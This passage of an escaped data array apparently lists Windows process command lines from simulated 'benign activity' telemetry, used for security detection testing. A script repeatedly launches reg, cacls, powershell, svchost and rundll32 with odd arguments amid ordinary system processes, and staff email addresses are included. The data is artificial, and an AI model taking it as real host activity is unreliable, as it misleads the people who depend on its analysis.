/installsou...\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 2...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 13 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -15216 /12420\",\"ping  127.0.0.1 -n 19 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 5 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -29637\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30962 /15074\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3232\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"rundll32  \\\\28790\\\\506.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 8 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 3 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 2 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 29 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 30 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\5728\\\\16265.exe\",\"ping  127.0.0.1 -n 22 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBeni...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 22 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9528 /16911\",\"ping  127.0.0.1 -n 22 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -27468\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 22 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 22 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 22 \",\"rundll32  \\\\5914\\\\3172.exe\",\"ping  127.0.0.1 -n 22 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"ping  127.0.0.1 -n 22 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 22 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 25 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 32 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 2 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 2...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 16 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -981 /7488\",\"ping  127.0.0.1 -n 20 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 24 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -3759\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1796 /27802\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2134\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"rundll32  \\\\25124\\\\21095.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 3 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 10 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 10 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 13 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 22 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\15930\\\\31294.exe\",\"ping  127.0.0.1 -n 20 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBeni...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 20 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18358 /18002\",\"ping  127.0.0.1 -n 20 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6872\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 20 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 20 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 20 \",\"rundll32  \\\\24611\\\\27906.exe\",\"ping  127.0.0.1 -n 20 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"ping  127.0.0.1 -n 20 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 20 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 6 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 11 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 26 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 2...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 18 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -19514 /2556\",\"ping  127.0.0.1 -n 21 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 11 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -10650\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11149 /8068\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2525\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2780\\\" \\\"1640\\\" \\\"1628\\\" \\\"1...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"rundll32  \\\\10012\\\\26584.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"3760\\\" \\\"1628\\\" \\\"1608\\\" \\\"1...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 30 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 21 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 18 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 30 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\26132\\\\13555.exe\",\"ping  127.0.0.1 -n 18 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBeni...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 18 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26958 /15519\",\"ping  127.0.0.1 -n 18 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -8210\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 18 \",\"rundll32  \\\\21814\\\\15398.exe\",\"ping  127.0.0.1 -n 18 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 20 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 23 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 17 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"taskhostw.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe RefreshSettings\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 2...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 21 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -5279 /30391\",\"ping  127.0.0.1 -n 21 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -17541\",\"ping  127.0.0.1 -n 25 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 26 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 14 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 5 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\3567\\\\28584.exe\",\"ping  127.0.0.1 -n 15 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBeni...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 15 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25563 /10689\",\"ping  127.0.0.1 -n 15 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4674\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 15 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 15 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 15 \",\"rundll32  \\\\17279\\\\3548.exe\",\"ping  127.0.0.1 -n 15 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"ping  127.0.0.1 -n 15 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 15 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 2 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 2 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 9 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"nan\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"nan\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 